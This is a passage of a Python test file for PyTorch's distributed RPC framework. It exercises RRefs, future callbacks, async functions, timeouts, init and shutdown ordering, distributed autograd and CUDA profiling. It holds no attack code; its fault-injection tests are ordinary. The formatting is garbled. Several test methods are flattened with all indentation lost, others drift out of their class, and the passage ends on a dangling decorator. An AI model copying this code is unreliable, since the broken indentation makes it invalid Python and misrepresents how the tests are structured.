        dst_rank = (self.rank + 1) % self.world_size
        rref = self._create_rref()
        ret = rpc.rpc_sync(
            worker_name(dst_rank),
            check_rref_confirmed,
            args=(rref,)
        )
        self.assertEqual(ret, True)
    @dist_init
    def test_user_rrefs_confirmed_remote(self):
        # Same as test_user_rrefs_confirmed, but via rpc.remote + to_here().
        dst_rank = (self.rank + 1) % self.world_size
        rref = self._create_rref()
        ret_rref = rpc.remote(
            worker_name(dst_rank),
            check_rref_confirmed,
            args=(rref,)
        )
        self.assertEqual(ret_rref.to_here(), True)
    @dist_init
    def test_rref_py_pickle_not_supported(self):
        # RRefs may only travel through the RPC pickler; torch.save must fail.
        local_rref = RRef(35)
        with TemporaryFileName() as fname:
            with self.assertRaisesRegex(RuntimeError, "Can not pickle rref in python pickler"):
                torch.save(local_rref, fname)
    @dist_init
    def test_remote_throw(self):
        # An exception raised during remote execution must surface on to_here().
        rref = rpc.remote(worker_name((self.rank + 1) % self.world_size),
                          raise_or_inc,
                          args=(torch.ones(2),))
        with self.assertRaisesRegex(Exception, ".*Expected error.*"):
            rref.to_here()
    @dist_init
    def test_non_cont_tensors(self):
        # Non-contiguous tensors must round-trip through RPC with their values
        # and non-contiguity preserved.
        if self.rank == 0:
            # Create a non-contiguous tensor.
            t = torch.rand(5, 5)
            t_view = t.narrow(1, 2, 2)
            self.assertFalse(t_view.is_contiguous())
            t_cont = t_view.contiguous()
            self.assertTrue(t_cont.is_contiguous())
            self.assertEqual(t_view, t_cont)

            # Send non-cont tensor over RPC.
            next_rank = (self.rank + 1) % self.world_size
            t_ret = rpc.rpc_sync(worker_name(next_rank), non_cont_test, args=(t_view, t_cont))

            # Verify the returned tensor.
            self.assertEqual(t_view, t_ret)
            self.assertFalse(t_ret.is_contiguous())
    @dist_init
    def test_callback_simple(self):
        # A `then` callback must observe the RPC result, and waiting on the
        # original future multiple times must keep returning the same value.
        set_by_cb = concurrent.futures.Future()
        n = self.rank + 1

        def callback(fut):
            ret = fut.wait()
            self.assertEqual(ret, torch.ones(n, n) * 2)
            set_by_cb.set_result(ret.clone() + 1)

        fut = rpc.rpc_async(
            worker_name(n % self.world_size),
            torch.add,
            args=(torch.ones(n, n), torch.ones(n, n))
        )

        fut.then(callback)

        self.assertEqual(fut.wait(), torch.ones(n, n) * 2)
        self.assertEqual(set_by_cb.result(), torch.ones(n, n) * 2 + 1)
        self.assertEqual(fut.wait(), torch.ones(n, n) * 2)
    @dist_init
    def test_callback_wrong_arg_num(self):
        # Passing a callback with the wrong arity must fail the chained future,
        # not the original one.
        set_by_cb = concurrent.futures.Future()
        n = self.rank + 1

        fut = rpc.rpc_async(
            worker_name(n % self.world_size),
            torch.add,
            args=(torch.ones(n, n), torch.ones(n, n))
        )

        cb_fut = fut.then(my_function)

        self.assertEqual(fut.wait(), torch.ones(n, n) * 2)

        with self.assertRaisesRegex(
            RuntimeError,
            "my\\_function\\(\\) missing 2 required positional arguments"
        ):
            cb_fut.wait()
    @dist_init
    def test_callback_wrong_arg_type(self):
        # A callback that misuses its Future argument (adds to it directly)
        # must fail the chained future with the underlying TypeError text.
        dst = worker_name((self.rank + 1) % self.world_size)

        fut0 = rpc.rpc_async(dst, torch.add, args=(torch.ones(2, 2), 1))
        fut1 = fut0.then(lambda x: x + 1)

        with self.assertRaisesRegex(
            RuntimeError,
            "unsupported operand type\\(s\\) for \\+"
        ):
            fut1.wait()
    @dist_init
    def test_callback_multi(self):
        # Multiple `then` callbacks on one future must all run, each receiving
        # the same completed value.
        num_cbs = 10
        n = self.rank + 1

        def callback(idx, fut):
            ret = fut.wait()
            self.assertEqual(ret, torch.ones(n, n) * 2)
            return ret + idx

        fut = rpc.rpc_async(
            worker_name(n % self.world_size),
            torch.add,
            args=(torch.ones(n, n), torch.ones(n, n))
        )

        cb_futs = []
        for idx in range(num_cbs):
            cb_futs.append(fut.then(partial(callback, idx)))

        self.assertEqual(fut.wait(), torch.ones(n, n) * 2)

        for idx in range(num_cbs):
            self.assertEqual(
                cb_futs[idx].wait(),
                torch.ones(n, n) * 2 + idx
            )

        self.assertEqual(fut.wait(), torch.ones(n, n) * 2)
@dist_init
def test_callback_chain(self):
n = self.rank + 1
dst = worker_name(n % self.world_size)
def callback(fut):
return fut.wait() + 1
fut = rpc.rpc_async(
worker_name(n % self.world_size),
torch.add,
args=(torch.ones(n, n), 1)
)
num_cbs = 20
for _ in range(num_cbs):
fut = fut.then(callback)
self.assertEqual(fut.wait(), torch.ones(n, n) + 1 + num_cbs)
    @dist_init
    def test_callback_in_rpc(self):
        # A remote UDF may itself issue an RPC and attach a callback; the
        # combined result (x + 1 + 2) must come back to this caller.
        dst1 = worker_name((self.rank + 1) % self.world_size)
        dst2 = worker_name((self.rank + 2) % self.world_size)

        ret = rpc.rpc_sync(
            dst1,
            add_use_future_cb,
            args=(dst2, torch.ones(2, 2), 1, 2)
        )
        self.assertEqual(ret, torch.ones(2, 2) + 1 + 2)
    @dist_init
    def test_callback_with_ret(self):
        # A `then` callback may issue a nested RPC and wait on its own chained
        # future; the outer future must see the fully combined result.
        dst = worker_name((self.rank + 1) % self.world_size)

        def callback(fut0):
            fut2 = rpc.rpc_async(
                dst,
                torch.add,
                args=(fut0.wait(), 1)
            ).then(lambda fut1: fut1.wait() + 1)

            return fut2.wait()

        fut3 = rpc.rpc_async(
            dst,
            torch.add,
            args=(torch.ones(2, 2), 1)
        ).then(callback)

        self.assertEqual(fut3.wait(), torch.ones(2, 2) + 3)
    @dist_init
    def test_callback_with_error(self):
        # The callback sees the original error via fut0.wait(); an error raised
        # inside the callback becomes the chained future's error.
        dst = worker_name((self.rank + 1) % self.world_size)

        def callback(fut0):
            with self.assertRaisesRegex(ValueError, "Expected error"):
                fut0.wait()
            raise RuntimeError("Another expected error")

        fut1 = rpc.rpc_async(dst, raise_func).then(callback)
        with self.assertRaisesRegex(RuntimeError, "Another expected error"):
            fut1.wait()
    @dist_init
    def test_callback_none(self):
        # `then(None)` must be rejected with a TypeError from pybind argument
        # checking.
        dst = worker_name((self.rank + 1) % self.world_size)
        with self.assertRaisesRegex(
            TypeError,
            "incompatible function arguments."
        ):
            rpc.rpc_async(dst, raise_func).then(None)
    @dist_init
    def test_add_done_callback(self):
        # add_done_callback must run on completion; unlike `then` it returns no
        # future, so a `then` callback is used to sequence the final check.
        set_by_cb = False
        n = self.rank + 1

        def callback(fut):
            nonlocal set_by_cb
            fut.wait()
            set_by_cb = True

        fut = rpc.rpc_async(
            worker_name(n % self.world_size),
            torch.add,
            args=(torch.ones(n, n), torch.ones(n, n))
        )

        fut.add_done_callback(callback)
        fut_then = fut.then(lambda _: True)

        self.assertEqual(fut.wait(), torch.ones(n, n) * 2)

        # We have no guarantee that the add_done_callback fn will execute before the test finishes.
        # Adding a 'then' callback that runs afterwards to guarantee we wait for the first callback
        fut_then.wait()
        self.assertTrue(set_by_cb)
        self.assertEqual(fut.wait(), torch.ones(n, n) * 2)
    @dist_init
    def test_mark_future_twice(self):
        # Calling set_result on an already-completed RPC future must raise.
        fut = rpc.rpc_async(
            worker_name((self.rank + 1) % self.world_size),
            torch.add,
            args=(torch.zeros(2, 2), 1)
        )
        self.assertEqual(fut.wait(), torch.zeros(2, 2) + 1)
        with self.assertRaisesRegex(
            RuntimeError,
            "Future can only be marked completed once"
        ):
            fut.set_result(1)
@dist_init
def test_pickle_future(self):
fut = torch.futures.Future()
errMsg = "Can not pickle torch.futures.Future"
dst = worker_name((self.rank + 1) % self.world_size)
with TemporaryFileName() as fname:
with self.assertRaisesRegex(RuntimeError, errMsg):
rpc.rpc_sync(dst, fail_on_fut, args=(fut,))
with TemporaryFileName() as fname:
with self.assertRaisesRegex(RuntimeError, errMsg):
rpc.rpc_async(dst, fail_on_fut, args=(fut,))
with TemporaryFileName() as fname:
with self.assertRaisesRegex(RuntimeError, errMsg):
rpc.remote(dst, fail_on_fut, args=(fut,))
    @dist_init
    def test_future_done(self):
        # done() must report True after a successful wait().
        dst = worker_name((self.rank + 1) % self.world_size)
        fut = rpc.rpc_async(dst, torch.add, args=(torch.zeros(2), 1))
        fut.wait()
        self.assertTrue(fut.done())
    @dist_init
    def test_future_done_exception(self):
        # done() must also report True when the future completed with an error.
        dst = worker_name((self.rank + 1) % self.world_size)
        fut = rpc.rpc_async(dst, raise_func)
        with self.assertRaisesRegex(ValueError, "Expected error"):
            fut.wait()
        self.assertTrue(fut.done())
def _test_future_cb(self, func):
dst1 = worker_name((self.rank + 1) % self.world_size)
dst2 = worker_name((self.rank + 2) % self.world_size)
ret = rpc.rpc_sync(
dst1,
func,
args=(dst2, torch.ones(2, 2), 1, 2)
)
self.assertEqual(ret, torch.ones(2, 2) + 1 + 2)
    @dist_init
    def test_future_in_rpc(self):
        # Remote UDF completes a Future via set_result (see _test_future_cb).
        self._test_future_cb(add_use_future_set_result)
    @dist_init
    def test_future_nested_callback(self):
        # Remote UDF uses a nested callback chain (see _test_future_cb).
        self._test_future_cb(add_use_future_nested_cb)
def _test_async_function_raise(self, mode):
with self.assertRaisesRegex(RuntimeError, "Expected error"):
self._run_func_in_mode(
worker_name((self.rank + 1) % self.world_size),
async_raise_func,
mode
)
    @dist_init
    def test_async_function_raise(self):
        # Error propagation via rpc_sync.
        self._test_async_function_raise(RPCExecMode.SYNC)
    @dist_init
    def test_async_function_raise_async(self):
        # Error propagation via rpc_async.
        self._test_async_function_raise(RPCExecMode.ASYNC)
    @dist_init
    def test_async_function_raise_remote(self):
        # Error propagation via rpc.remote + to_here.
        self._test_async_function_raise(RPCExecMode.REMOTE)
def _test_async_function_wrong_return_type(self, mode):
errMsg = (
"Functions decorated with @rpc\\.async_function must return a "
"torch\\.futures\\.Future object,"
)
with self.assertRaisesRegex(RuntimeError, errMsg):
self._run_func_in_mode(
worker_name((self.rank + 1) % self.world_size),
async_wrong_type,
mode
)
    @dist_init
    def test_async_function_wrong_return_type(self):
        # Wrong return type detected via rpc_sync.
        self._test_async_function_wrong_return_type(RPCExecMode.SYNC)
    @dist_init
    def test_async_function_wrong_return_type_async(self):
        # Wrong return type detected via rpc_async.
        self._test_async_function_wrong_return_type(RPCExecMode.ASYNC)
    @dist_init
    def test_async_function_wrong_return_type_remote(self):
        # Wrong return type detected via rpc.remote + to_here.
        self._test_async_function_wrong_return_type(RPCExecMode.REMOTE)
    @dist_init
    def test_async_function_simple(self):
        # async_add on dst1 forwards the add to dst2 and returns a Future.
        dst1 = worker_name((self.rank + 1) % self.world_size)
        dst2 = worker_name((self.rank + 2) % self.world_size)

        ret = rpc.rpc_sync(dst1, async_add, args=(dst2, torch.ones(2, 2), 1))
        self.assertEqual(ret, torch.ones(2, 2) + 1)
def _test_async_function(self, fn, mode=RPCExecMode.SYNC):
dst1 = worker_name((self.rank + 1) % self.world_size)
dst2 = worker_name((self.rank + 2) % self.world_size)
args = (dst2, torch.ones(2, 2), 1, 2)
ret = self._run_func_in_mode(dst1, fn, mode, args=args)
self.assertEqual(ret, torch.ones(2, 2) + 3)
    @dist_init
    def test_async_function_with_future_ctor(self):
        # Async function that constructs its own Future (sync mode).
        self._test_async_function(async_add_with_future_ctor)
    @dist_init
    def test_async_function_with_future_ctor_remote(self):
        # Async function that constructs its own Future (remote mode).
        self._test_async_function(
            async_add_with_future_ctor,
            RPCExecMode.REMOTE
        )
    @dist_init
    def test_async_function_chained(self):
        # Async function built on chained `then` callbacks (sync mode).
        self._test_async_function(async_add_chained)
    @dist_init
    def test_async_function_chained_remote(self):
        # Async function built on chained `then` callbacks (remote mode).
        self._test_async_function(async_add_chained, RPCExecMode.REMOTE)
    @dist_init
    def test_async_function_nested(self):
        # Async function issuing nested RPCs (sync mode).
        self._test_async_function(async_add_nested)
    @dist_init
    def test_async_function_nested_remote(self):
        # Async function issuing nested RPCs (remote mode).
        self._test_async_function(async_add_nested, RPCExecMode.REMOTE)
    @dist_init
    def test_async_static_method(self):
        # Async execution on a static method (sync mode).
        self._test_async_function(AsyncExecutionClass.static_async_add)
    @dist_init
    def test_async_static_method_remote(self):
        # Async execution on a static method (remote mode).
        self._test_async_function(
            AsyncExecutionClass.static_async_add,
            RPCExecMode.REMOTE
        )
    @dist_init
    def test_async_class_method(self):
        # Async execution on a classmethod (sync mode).
        self._test_async_function(AsyncExecutionClass.class_async_add)
    @dist_init
    def test_async_class_method_remote(self):
        # Async execution on a classmethod (remote mode).
        self._test_async_function(
            AsyncExecutionClass.class_async_add,
            RPCExecMode.REMOTE
        )
    # NOTE(review): the doubled "test_test" in this helper's name looks like a
    # typo, but renaming it would require updating all three callers, so it is
    # kept as-is.
    def _test_test_async_class_rref_proxy(self, mode=RPCExecMode.SYNC):
        # Exercise static, class, and bound async methods through the RRef
        # proxy APIs (rpc_sync / rpc_async / remote). Each call computes
        # x + x + y = 4 * x, and three calls sum to 3 * 4 * x.
        dst1 = worker_name((self.rank + 1) % self.world_size)
        dst2 = worker_name((self.rank + 2) % self.world_size)
        rref = rpc.remote(dst1, AsyncExecutionClass)

        x = torch.ones(2, 2)
        y = torch.ones(2, 2) + 1
        if mode == RPCExecMode.SYNC:
            ret = rref.rpc_sync().static_async_add(dst2, x, x, y)
            ret += rref.rpc_sync().class_async_add(dst2, x, x, y)
            ret += rref.rpc_sync().bound_async_add(dst2, x, x, y)
        elif mode == RPCExecMode.ASYNC:
            ret = rref.rpc_async().static_async_add(dst2, x, x, y).wait()
            ret += rref.rpc_async().class_async_add(dst2, x, x, y).wait()
            ret += rref.rpc_async().bound_async_add(dst2, x, x, y).wait()
        elif mode == RPCExecMode.REMOTE:
            ret = rref.remote().static_async_add(dst2, x, x, y).to_here()
            ret += rref.remote().class_async_add(dst2, x, x, y).to_here()
            ret += rref.remote().bound_async_add(dst2, x, x, y).to_here()

        self.assertEqual(ret, 3 * 4 * x)
    @dist_init
    def test_async_class_rref_proxy(self):
        # RRef proxy with rpc_sync.
        self._test_test_async_class_rref_proxy()
    @dist_init
    def test_async_class_rref_proxy_async(self):
        # RRef proxy with rpc_async.
        self._test_test_async_class_rref_proxy(mode=RPCExecMode.ASYNC)
    @dist_init
    def test_async_class_rref_proxy_remote(self):
        # RRef proxy with remote.
        self._test_test_async_class_rref_proxy(mode=RPCExecMode.REMOTE)
def _test_async_function_multi(self, fn, mode=RPCExecMode.SYNC):
dst1 = worker_name((self.rank + 1) % self.world_size)
dst2 = worker_name((self.rank + 2) % self.world_size)
num = 20
step = 3
args = (dst2, torch.ones(2, 2), num, step)
ret = self._run_func_in_mode(dst1, fn, mode, args=args)
self.assertEqual(ret, torch.ones(2, 2) + num * step)
    @dist_init
    def test_async_function_multi_chained(self):
        # Multi-step chained async function (sync mode).
        self._test_async_function_multi(async_add_chained_multi)
    @dist_init
    def test_async_function_multi_chained_async(self):
        # Multi-step chained async function (async mode).
        self._test_async_function_multi(
            async_add_chained_multi,
            RPCExecMode.ASYNC
        )
    @dist_init
    def test_async_function_multi_chained_remote(self):
        # Multi-step chained async function (remote mode).
        self._test_async_function_multi(
            async_add_chained_multi,
            RPCExecMode.REMOTE
        )
    @dist_init
    def test_async_function_multi_fanout(self):
        # Fan-out async function (sync mode).
        self._test_async_function_multi(async_add_multi_fanout)
    @dist_init
    def test_async_function_multi_fanout_async(self):
        # Fan-out async function (async mode).
        self._test_async_function_multi(
            async_add_multi_fanout,
            RPCExecMode.ASYNC
        )
    @dist_init
    def test_async_function_multi_fanout_remote(self):
        # Fan-out async function (remote mode).
        self._test_async_function_multi(
            async_add_multi_fanout,
            RPCExecMode.REMOTE
        )
def _test_return_future(self, mode):
with self.assertRaisesRegex(
RuntimeError,
"Can not pickle torch.futures.Future"
):
self._run_func_in_mode(
worker_name((self.rank + 1) % self.world_size),
return_future,
mode
)
    @dist_init
    def test_return_future(self):
        # Future return rejected via rpc_sync.
        self._test_return_future(RPCExecMode.SYNC)
    @dist_init
    def test_return_future_async(self):
        # Future return rejected via rpc_async.
        self._test_return_future(RPCExecMode.ASYNC)
    @dist_init
    def test_return_future_remote(self):
        # Future return rejected via rpc.remote + to_here.
        self._test_return_future(RPCExecMode.REMOTE)
@dist_init
def test_rref_timeout(self):
    """A short rpc.remote() timeout must poison the RRef and its future."""
    # This test is similar to ones in FaultyProcessGroupTest, but is meant to be
    # run with other backends besides ProcessGroup.
    if self.rank != 0:
        return
    dst_rank = (self.rank + 1) % self.world_size
    dst_worker = "worker{}".format(dst_rank)
    # 10 ms timeout vs. a 2 s sleep on the callee: creation cannot finish.
    rref = rpc.remote(dst_worker, my_sleep_func, args=(2, ), timeout=0.01)
    # Future corresponding to the remote creation should time out.
    expected_error = self.get_timeout_error_regex()
    with self.assertRaisesRegex(RuntimeError, expected_error):
        rref._get_future().wait()
    # Call to ensure pending callbacks are run.
    wait_until_pending_futures_and_users_flushed()
    with self.assertRaisesRegex(RuntimeError, "RRef creation"):
        rref.to_here()
    # Wait before shutdown so rank 1 has processed the (failed) owner/fork.
    wait_until_owners_and_forks_on_rank(1, 1, rank=1)
@dist_init(setup_rpc=False)
@sandcastle_skip_if(
    os.environ.get("RPC_INIT_WITH_TCP", None) == "1",
    "init_pg_then_rpc does not work with TCP init, see https://github.com/pytorch/pytorch/issues/41614."
)
def test_init_pg_then_rpc(self):
    """ProcessGroup and RPC must coexist when PG is initialized first."""
    dist.init_process_group(
        backend="gloo",
        init_method=self.init_method,
        rank=self.rank,
        world_size=self.world_size,
    )
    rpc.init_rpc(
        name=worker_name(self.rank),
        backend=self.rpc_backend,
        rank=self.rank,
        world_size=self.world_size,
        rpc_backend_options=self.rpc_backend_options,
    )
    # Test RPC.
    next_rank = (self.rank + 1) % self.world_size
    ret = rpc.rpc_sync(worker_name(next_rank), torch.add, args=(torch.ones(2, 2), 1))
    self.assertEqual(ret, torch.ones(2, 2) + 1)
    # Test PG
    dist.barrier()
    rpc.shutdown()
@dist_init(setup_rpc=False)
@sandcastle_skip_if(
    os.environ.get("RPC_INIT_WITH_TCP", None) == "1",
    "init_rpc_then_pg does not work with TCP init, see https://github.com/pytorch/pytorch/issues/41614."
)
def test_init_rpc_then_pg(self):
    """Mirror of test_init_pg_then_rpc: RPC initialized before ProcessGroup."""
    rpc.init_rpc(
        name=worker_name(self.rank),
        backend=self.rpc_backend,
        rank=self.rank,
        world_size=self.world_size,
        rpc_backend_options=self.rpc_backend_options,
    )
    dist.init_process_group(
        backend="gloo",
        init_method=self.init_method,
        rank=self.rank,
        world_size=self.world_size,
    )
    # Test RPC.
    next_rank = (self.rank + 1) % self.world_size
    ret = rpc.rpc_sync(worker_name(next_rank), torch.add, args=(torch.ones(2, 2), 1))
    self.assertEqual(ret, torch.ones(2, 2) + 1)
    # Test PG
    dist.barrier()
    rpc.shutdown()
@dist_init
def test_wait_all_with_exception(self):
    """torch.futures.wait_all must surface the remote exception when every
    future fails.

    Cleanup: dropped the unused `ret =` binding (the call is expected to
    raise, so nothing is ever returned) and built the futures list with a
    comprehension instead of a manual append loop.
    """
    dst = worker_name((self.rank + 1) % self.world_size)
    futs = [rpc.rpc_async(dst, raise_func) for _ in range(10)]
    with self.assertRaisesRegex(ValueError, "Expected error"):
        torch.futures.wait_all(futs)
@dist_init
def test_wait_all_with_partial_exception(self):
    """torch.futures.wait_all must raise even when only one of many
    futures fails.

    Cleanup: dropped the unused `ret =` binding (the call is expected to
    raise) and built the successful futures with a comprehension.
    """
    dst = worker_name((self.rank + 1) % self.world_size)
    futs = [rpc.rpc_async(dst, torch.add, args=(torch.ones(2), 1)) for _ in range(10)]
    # One failing future among ten successful ones is enough to raise.
    futs.append(rpc.rpc_async(dst, raise_func))
    with self.assertRaisesRegex(ValueError, "Expected error"):
        torch.futures.wait_all(futs)
@dist_init(setup_rpc=False)
@sandcastle_skip_if(
    os.environ.get("RPC_INIT_WITH_TCP", None) == "1",
    "Test does not work with TCP init, see https://github.com/pytorch/pytorch/issues/46491",
)
def test_init_rpc_twice(self):
    """RPC must be re-initializable after a full shutdown."""
    initialize_pg(self.file_init_method, self.rank, self.world_size)
    rpc.init_rpc(
        name=worker_name(self.rank),
        backend=self.rpc_backend,
        rank=self.rank,
        world_size=self.world_size,
        rpc_backend_options=self.rpc_backend_options,
    )
    rpc.shutdown()
    # Wait for all init to complete.
    dist.barrier()
    # Ensure rpc initialization works again.
    rpc.init_rpc(
        name=worker_name(self.rank),
        backend=self.rpc_backend,
        rank=self.rank,
        world_size=self.world_size,
        rpc_backend_options=self.rpc_backend_options,
    )
    # Verify RPCs work after re-init.
    dst = worker_name((self.rank + 1) % self.world_size)
    rpc.rpc_sync(dst, torch.add, args=(torch.ones(2, 2), 1))
    rpc.rpc_sync(dst, foo_add, args=())
    rpc.shutdown()
def test_wrong_types(self):
    """init_rpc must reject a string backend and a plain-dict options arg."""
    with self.assertRaisesRegex(
        TypeError,
        "Argument backend must be a member of BackendType",
    ):
        rpc.init_rpc(
            name=worker_name(self.rank),
            rank=self.rank,
            world_size=self.world_size,
            # String instead of a BackendType member.
            backend="TENSORPIPE",
        )
    with self.assertRaisesRegex(
        TypeError,
        "Argument rpc_backend_options must be an instance of RpcBackendOptions",
    ):
        rpc.init_rpc(
            name=worker_name(self.rank),
            rank=self.rank,
            world_size=self.world_size,
            backend=self.rpc_backend,
            # Raw dict instead of an RpcBackendOptions instance.
            rpc_backend_options={"init_method": self.init_method}
        )
def test_cannot_infer_backend_from_options(self):
    """init_rpc without a backend and with unrecognized options must not guess."""
    # An exception should be raised if the backend isn't specified but
    # options are given which are not an instance of any of the known
    # agents' option classes.
    rpc_backend_options = FooBackendOptions(self.init_method)
    with self.assertRaisesRegex(TypeError, "Could not infer backend for options"):
        rpc.init_rpc(
            name=worker_name(self.rank),
            rank=self.rank,
            world_size=self.world_size,
            # Do _not_ pass backend.
            rpc_backend_options=rpc_backend_options,
        )
@dist_init
def test_owner_rref_backward(self):
    """backward() on owner RRefs, with and without a dist_autograd context."""
    dst = worker_name((self.rank + 1) % self.world_size)
    t1 = torch.rand(10, 10, requires_grad=True)
    # Context-free backward accumulates into t1.grad directly.
    rref = rpc.RRef(t1.sum() + t1.sum())
    rref.backward()
    expected_grad = torch.ones_like(t1) * 2
    self.assertEqual(expected_grad, t1.grad)
    # With a dist_autograd context, gradients land in the context instead.
    with dist_autograd.context() as context_id:
        t2 = rpc.rpc_sync(dst, torch.add, args=(t1, t1))
        rref = rpc.RRef(t2.sum())
        rref.backward(context_id)
        self.assertEqual(expected_grad, dist_autograd.get_gradients(context_id)[t1])
    # Double backward.
    with dist_autograd.context() as context_id:
        t2 = rpc.rpc_sync(dst, torch.add, args=(t1, t1))
        rref = rpc.RRef(t2.sum())
        rref.backward(context_id, retain_graph=True)
        rref.backward(context_id)
        self.assertEqual(expected_grad * 2, dist_autograd.get_gradients(context_id)[t1])
    # Test errors.
    with self.assertRaisesRegex(RuntimeError, "tensors does not require grad and does not have a grad_fn"):
        rpc.RRef(torch.rand(10)).backward()
    with self.assertRaisesRegex(RuntimeError, "grad can be implicitly created only for scalar outputs"):
        rpc.RRef(torch.rand(10, requires_grad=True)).backward()
    with self.assertRaisesRegex(RuntimeError, "Could not find autograd context with id: 100"):
        rpc.RRef(torch.rand(10, requires_grad=True).sum()).backward(100)
    with self.assertRaisesRegex(RuntimeError, "RRef should contain a tensor for .backward()"):
        rpc.RRef("foo").backward()
# Tiny remote targets used by the RRef-backward tests below.
@staticmethod
def _sum(x):
    # Scalar reduction: yields a tensor .backward() can run on.
    return x.sum()
@staticmethod
def _identity(x):
    # Returns the argument unchanged (used to produce a non-tensor RRef).
    return x
@dist_init
def test_user_rref_backward(self):
    """backward() on a user RRef requires a dist_autograd context id."""
    dst = worker_name((self.rank + 1) % self.world_size)
    t = torch.rand(10, requires_grad=True)
    with dist_autograd.context() as context_id:
        rref = rpc.remote(dst, RpcTest._sum, args=(t,))
        # Two backwards (first retains the graph) double the gradient.
        rref.backward(context_id, retain_graph=True)
        rref.backward(context_id)
        self.assertEqual(torch.ones_like(t) * 2, dist_autograd.get_gradients(context_id)[t])
    with dist_autograd.context() as context_id:
        # Non-tensor RRef and missing context id are both errors.
        rref = rpc.remote(dst, RpcTest._identity, args=("foo",))
        with self.assertRaisesRegex(RuntimeError, "RRef should contain a tensor for .backward()"):
            rref.backward(context_id)
        with self.assertRaisesRegex(RuntimeError, "User RRefs require 'dist_autograd_ctx_id' to be specified"):
            rref.backward()
@dist_init(setup_rpc=False)
def test_shutdown_errors(self):
    """Failures injected into the shutdown handshake must propagate."""
    initialize_pg(self.file_init_method, self.rank, self.world_size)
    rpc.init_rpc(
        name=worker_name(self.rank),
        backend=self.rpc_backend,
        rank=self.rank,
        world_size=self.world_size,
        rpc_backend_options=self.rpc_backend_options,
    )
    if self.rank != 0:
        og_func = rpc.api._broadcast_to_followers
        og_rref_func = rpc.api._delete_all_user_and_unforked_owner_rrefs
        # Monkey-patch _broadcast_to_followers to fail, which would ensure
        # _all_gather on leader raises an exception.
        def raise_error(sequence_id, objects_map):
            og_func(sequence_id, objects_map)
            raise RuntimeError('simulation')
        # Monkey-patch _delete_all_user_and_unforked_owner_rrefs to fail,
        # which would ensure barrier is not called on followers.
        def rref_error():
            raise RuntimeError('simulation rref')
        try:
            rpc.api._broadcast_to_followers = raise_error
            rpc.api._delete_all_user_and_unforked_owner_rrefs = rref_error
            with self.assertRaisesRegex(RuntimeError, 'simulation rref'):
                rpc.shutdown()
        finally:
            # Always restore the real implementations.
            rpc.api._broadcast_to_followers = og_func
            rpc.api._delete_all_user_and_unforked_owner_rrefs = og_rref_func
    else:
        # The leader's _all_gather never completes because followers failed.
        with self.assertRaisesRegex(RuntimeError, 'timed out in _all_gather'):
            rpc.shutdown()
    dist.barrier()
def _trainer_func(self, rref, sparse):
    """Trainer loop for the parameter-server test.

    `rref` presumably points at the parameter-server object (it exposes
    ``average`` and ``get_gradient``) — confirm against _my_parameter_server.
    """
    m = MyEmbeddingBagModel(sparse=sparse)
    loss_fn = nn.MSELoss()
    for i in range(10):
        outputs = m(torch.rand(10, 10).long())
        loss_fn(outputs, torch.rand(10, 10)).backward()
        gradient = list(m.parameters())[0].grad
        # Ship the local gradient to the PS; get the averaged one back.
        fut = rref.rpc_async().average(rref, i, gradient)
        gradient = fut.wait()
        if gradient.is_sparse:
            gradient = gradient.to_dense().double()
        ps_gradient = rref.rpc_sync().get_gradient(rref)
        if ps_gradient.is_sparse:
            ps_gradient = ps_gradient.to_dense().double()
        # The average returned to the trainer must match what the PS holds.
        self.assertTrue(torch.equal(gradient, ps_gradient))
@dist_init
def test_my_parameter_server(self):
    # Dense variant; sparse=True is exercised elsewhere in this file.
    self._my_parameter_server(False)
class CudaRpcTest(RpcAgentTestFixture):
    """RPC tests that require CUDA devices on the workers."""

    @skip_if_lt_x_gpu(2)
    @dist_init
    def test_profiler_remote_cuda(self):
        """Profile CUDA ops executed remotely on two peers and check events."""
        # Only rank 1 drives the test; the other ranks serve as targets.
        if self.rank != 1:
            return
        dst_cuda_0 = (self.rank + 1) % self.world_size
        dst_cuda_1 = (self.rank + 2) % self.world_size
        dst_worker_cuda_0 = worker_name(dst_cuda_0)
        dst_worker_cuda_1 = worker_name(dst_cuda_1)
        with _profile(use_cuda=True) as p:
            # args=(0,)/(1,) presumably select the CUDA device on the callee —
            # confirm against udf_with_torch_ops.
            fut1 = rpc.rpc_async(dst_worker_cuda_0, udf_with_torch_ops, args=(0, ))
            fut2 = rpc.rpc_async(dst_worker_cuda_1, udf_with_torch_ops, args=(1, ))
            fut1.wait()
            fut2.wait()
        def get_name(event):
            # Strip the remote-op prefix to recover the plain op name.
            return event.name[event.name.find(REMOTE_OP_STR) + len(REMOTE_OP_STR):]
        function_events = p.function_events
        for event in function_events:
            if event.is_async:
                # Async (framework-side) events record no device time/kernels.
                self.assertEqual(0, event.cuda_time_total)
                self.assertEqual([], event.kernels)
                self.assertEqual(0, event.cuda_time)
            else:
                if event.node_id == 1:
                    continue
                self.assertTrue(event.node_id in [dst_cuda_0, dst_cuda_1])
                if get_name(event) in EXPECTED_REMOTE_EVENTS:
                    self.assertGreater(event.cuda_time_total, 0)
                    self.assertEqual(1, len(event.kernels))
                    kernel = event.kernels[0]
                    # The recorded kernel device must match the device index
                    # passed to the respective remote call above.
                    if event.node_id == dst_cuda_0:
                        self.assertEqual(kernel.device, 0)
                    if event.node_id == dst_cuda_1:
                        self.assertEqual(kernel.device, 1)
                    self.assertGreater(event.cuda_time, 0)
        # Validate that EXPECTED_REMOTE_EVENTS is a subset of remotely profiled
        # events.
        remote_events = [event for event in function_events if event.is_remote]
        remote_event_names = [get_name(event) for event in remote_events if get_name(event) in EXPECTED_REMOTE_EVENTS]
        self.assertEqual(set(remote_event_names), set(EXPECTED_REMOTE_EVENTS))
class FaultyAgentRpcTest(RpcAgentTestFixture):
    """Tests running against an agent that drops or delays chosen messages."""

    # no faulty_messages defined so this fails all retryable messages - see
    # faulty_rpc_agent_test_fixture.py for the list of retryable messages.
    @dist_init(messages_to_delay={})
    def test_check_failed_messages(self):
        """Retries of failed (retryable) messages must still yield correct results."""
        if self.rank == 0:
            dst_worker_b = worker_name((self.rank + 1) % self.world_size)
            dst_worker_c = worker_name((self.rank + 2) % self.world_size)
            # Worker0 sends RPC to Worker1 and creates an RRef there
            rref = rpc.remote(dst_worker_b, torch.add, args=(torch.ones(2, 2), torch.ones(2, 2)))
            # Worker0 sends an RPC to Worker2 with the RRef as an arg
            rpc.remote(dst_worker_c, add_rref_to_value, args=(rref, torch.ones(2, 2)))
            # check if the output is as expected
            self.assertEqual(rref.to_here(), torch.add(torch.ones(2, 2), torch.ones(2, 2)))
        # explicitly delete all User RRefs
        _delete_all_user_and_unforked_owner_rrefs()
# Sanity checks on how the faulty fixture threads backend options and
# fault configuration through the @dist_init decorator.
@dist_init
